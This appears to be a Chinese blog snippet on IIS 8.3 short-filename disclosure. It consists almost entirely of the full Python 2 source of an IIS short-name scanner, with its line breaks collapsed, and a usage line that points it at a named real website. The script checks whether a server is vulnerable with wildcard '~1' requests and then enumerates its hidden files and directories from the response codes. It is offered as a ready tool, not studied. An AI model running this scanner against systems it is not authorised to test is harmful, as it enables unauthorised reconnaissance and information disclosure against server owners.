Windows 还以 8.3 格式生成与 MS-DOS 兼容的(短)文件名,以允许基于 MS-DOS 或 16 位 Windows的程序访问这些文件。在cmd下输入“dir /x”即可看到短文件名的效果。
python2 iis6.0_shortname_scan.py https://blog.dyboy.cn
Notice: 限于IIS
#!/usr/bin/env python # encoding:utf-8 # An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com import sys import httplib import urlparse import threading import Queue import time class Scanner(): def __init__(self, target): self.target = target.lower() if not self.target.startswith('http'): self.target = 'http://%s' % self.target self.scheme, self.netloc, self.path, params, query, fragment = \ urlparse.urlparse(target) if self.path[-1:] != '/': # ends with slash self.path += '/' self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-' self.files = [] self.dirs = [] self.queue = Queue.Queue() self.lock = threading.Lock() self.threads = [] self.request_method = '' self.msg_queue = Queue.Queue() self.STOP_ME = False threading.Thread(target=self._print).start() def _conn(self): try: if self.scheme == 'https': conn = httplib.HTTPSConnection(self.netloc) else: conn = httplib.HTTPConnection(self.netloc) return conn except Exception , e: print '[_conn.Exception]', e return None def _get_status(self, path): try: conn = self._conn() conn.request(self.request_method, path) status = conn.getresponse().status conn.close() return status except Exception , e: raise Exception('[_get_status.Exception] %s' % str(e) ) def is_vul(self): try: for _method in ['GET', 'OPTIONS']: self.request_method = _method status_1 = self._get_status(self.path + '/*~1*/a.aspx') # an existed file/folder status_2 = self._get_status(self.path + '/l1j1e*~1*/a.aspx') # not existed file/folder if status_1 == 404 and status_2 != 404: return True return False except Exception , e: raise Exception('[is_vul.Exception] %s' % str(e) ) def run(self): for c in self.alphanum: self.queue.put( (self.path + c, '.*') ) # filename, extension for i in range(20): t = threading.Thread(target=self._scan_worker) self.threads.append(t) t.start() for t in self.threads: t.join() self.STOP_ME = True def report(self): print '-'* 64 for d in self.dirs: print 'Dir: %s' %d for f in self.files: print 'File: %s' %f #print('-' * 64) print '%d Directories, %d Files found in total' % (len(self.dirs), len(self.files)) print 'Note that * is a wildcard, matches any character zero or more times.' def _print(self): while not self.STOP_ME or (not self.msg_queue.empty()): if self.msg_queue.empty(): time.sleep(0.05) else: print self.msg_queue.get() def _scan_worker(self): while True: try: url, ext = self.queue.get(timeout=1.0) status = self._get_status(url + '*~1' + ext + '/1.aspx') if status == 404: self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext)) if len(url) - len(self.path)< 6: # enum first 6 chars only for c in self.alphanum: self.queue.put( (url + c, ext) ) else: if ext == '.*': self.queue.put( (url, '') ) if ext == '': self.dirs.append(url + '~1') self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]') elif len(ext) == 5 or (not ext.endswith('*')): # .asp* self.files.append(url + '~1' + ext) self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]') else: for c in 'abcdefghijklmnopqrstuvwxyz0123456789': self.queue.put( (url, ext[:-1] + c + '*') ) if len(ext) < 4: # < len('.as*') self.queue.put( (url, ext[:-1] + c) ) except Queue.Empty , e: break except Exception , e: print '[Exception]', e if __name__ == '__main__': if len(sys.argv) == 1: print 'Usage: python IIS_shortname_Scan.py http://www.target.com/' sys.exit() target = sys.argv[1] s = Scanner(target) if not s.is_vul(): s.STOP_ME = True print 'Server is not vulnerable' sys.exit(0) print 'Server is vulnerable, please wait, scanning...' s.run() s.report()